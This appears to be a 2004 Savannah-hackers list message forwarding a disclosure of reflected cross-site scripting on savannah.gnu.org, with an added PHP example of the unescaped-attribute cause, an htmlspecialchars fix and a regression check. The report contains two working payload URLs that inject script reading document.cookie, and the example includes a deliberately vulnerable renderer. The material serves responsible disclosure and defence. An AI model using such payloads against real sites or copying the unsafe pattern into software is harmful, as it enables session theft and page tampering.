[Savannah-hackers] [gnu.org #216816] Cross-Site Scripting Vulnerability
From: Justin Pence via RT
Subject: [Savannah-hackers] [gnu.org #216816] Cross-Site Scripting Vulnerability on savannah.gnu.org
Date: Fri, 10 Dec 2004 08:46:38 -0500
Hey, guys. Got a security report that I think you should see. I
already replied to him saying that I'm forwarding this to you guys,
might be a good idea to give him a quick note saying that you've seen
it.
--
Justin Pence
GNU/FSF Webmaster
-----------------------------------
Subject: Cross-Site Scripting Vulnerability on savannah.gnu.org
Date: Wed, 8 Dec 2004 18:30:22 +0100
To: <address@hidden>, <address@hidden>
From: "mikx" <address@hidden>
Hello,
this is a security vulnerability report. Please confirm receipt of
this email.
__Vulnerability Summary
savannah.gnu.org suffers from a Cross-Site Scripting (XSS) vulnerability:
http://savannah.gnu.org/search/?words="><script>alert(document.cookie)</script><x%20y="&type_of_search=soft&exact=1
and
https://savannah.gnu.org//account/login.php?form_loginname=x"><script>alert(document.cookie)</script><x%20y="
This can be used to obfuscate/fake the output and/or steal cookies by
inserting arbitrary html/javascript code.
__Contact Information
Please contact me by email or IM, both: address@hidden
Kind regards,
Michael Krax aka mikx
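
The shape of the reported parameter values (a closing quote and bracket, then markup) points to request input being echoed into a quoted HTML attribute without output encoding. The following is an added example, not part of the original e-mail and not Savannah's code: a hypothetical PHP field renderer in its unescaped form beside one that encodes with `htmlspecialchars`, with a DOM-based check that can serve as a regression test. All function names are assumptions.

```php
<?php
// Added illustration; not Savannah's source. Function names are hypothetical.

// Vulnerable pattern: request parameter copied verbatim into a quoted attribute.
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8.
function render_field_safe(string $name, string $value): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    return '<input type="text" name="' . htmlspecialchars($name, $flags, 'UTF-8')
         . '" value="' . htmlspecialchars($value, $flags, 'UTF-8') . '">';
}

// Regression check: parse the fragment and report what a browser would build.
function inspect_fragment(string $html): array
{
    libxml_use_internal_errors(true); // unknown tags such as <x> raise parser warnings
    $doc = new DOMDocument();
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'script_elements' => $doc->getElementsByTagName('script')->length,
        'value'           => $input ? $input->getAttribute('value') : null,
    ];
}

// The value carried by `words` / `form_loginname` in the report, URL-decoded.
$reported = '"><script>alert(document.cookie)</script><x y="';

foreach (['unsafe' => 'render_field_unsafe', 'safe' => 'render_field_safe'] as $label => $fn) {
    $r = inspect_fragment($fn('words', $reported));
    printf(
        "%-6s script elements: %d, value round-trips intact: %s\n",
        $label,
        $r['script_elements'],
        $r['value'] === $reported ? 'yes' : 'no'
    );
}
```

In the safe variant the whole input survives as inert attribute text, so the check passes only when no `script` element is created and the attribute value equals the original string.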